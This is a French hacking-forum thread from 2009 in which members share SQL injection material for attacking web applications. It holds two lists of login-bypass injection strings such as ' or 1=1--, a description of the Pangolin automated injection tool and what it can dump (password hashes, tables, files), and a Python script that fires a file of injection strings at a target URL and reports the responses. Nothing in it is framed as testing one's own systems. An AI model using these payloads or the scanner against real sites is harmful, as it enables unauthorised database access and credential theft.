Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: SQLi ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps
Sujet précédent :: Sujet suivant  
Auteur Message
Karl
Membre
Membre

Hors ligne

Inscrit le: 23 Nov 2009
Messages: 108

MessagePosté le: Dim 29 Nov - 18:05 (2009)    Sujet du message: SQLi Répondre en citant

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a


Revenir en haut
Publicité






MessagePosté le: Dim 29 Nov - 18:05 (2009)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Karl
Membre
Membre

Hors ligne

Inscrit le: 23 Nov 2009
Messages: 108

MessagePosté le: Dim 29 Nov - 18:14 (2009)    Sujet du message: SQLi Répondre en citant

Scanner Pangolin:
http://www.darknet.org.uk/2009/05/pangolin-automatic-sql-injection-tool/

Okay

Pangolin is an automatic SQL injection penetration testing tool developed by NOSEC. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.


Revenir en haut
Karl
Membre
Membre

Hors ligne

Inscrit le: 23 Nov 2009
Messages: 108

MessagePosté le: Dim 29 Nov - 18:17 (2009)    Sujet du message: SQLi Répondre en citant

Page de test Online:

http://www.zubrag.com/tools/sql-injection-test.php


Revenir en haut
Nostradamus
Membre
Membre

Hors ligne

Inscrit le: 26 Nov 2009
Messages: 33

MessagePosté le: Jeu 3 Déc - 14:09 (2009)    Sujet du message: SQLi Répondre en citant

Injection Checker
Travaille à partir d'un fichier contenant les chaines d'injection


#!/usr/bin/python
#Gets http response from a list of sql injections.

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys, httplib

def main(host, path):
try:
conn = httplib.HTTPConnection(host)
conn.request("GET", path)
r1 = conn.getresponse()
print "[+]",host+path,":",r1.status, r1.reason
except:
print "[-] Error Occurred"
pass

if len(sys.argv) != 3:
print "\nUsage: ./sqlresp.py <site> <list of injections>"
print "Example: ./sqlresp.py www.site.com/buy.php?id= injections.txt\n"
sys.exit(1)

print "\n d3hydr8[at]gmail[dot]com sqlResp v1.0"
print "----------------------------------------------"

try:
injects = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your injections path\n"
sys.exit(1)

host = sys.argv[1].strip("http://")
if host[-1:] != "=":
print "\n[-] No '=' on the end of address"
print "[+] adding '='"
host = host+"="
print "\n[+] Site:",host
print "[+] Injections Loaded:",len(injects),"\n\n"

for inj in injects:
try:
main(host.split("/",1)[0], host.split("/",1)[1]+inj.strip("\n"))
except(IndexError):
print "[-] Invalid Address\n"
sys.exit(1)
print "\n[+] Done\n"







Revenir en haut
Karl
Membre
Membre

Hors ligne

Inscrit le: 23 Nov 2009
Messages: 108

MessagePosté le: Lun 7 Déc - 10:44 (2009)    Sujet du message: SQLi Répondre en citant

Update des chaines d'injection:


admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a


Revenir en haut
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 09:06 (2017)    Sujet du message: SQLi

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com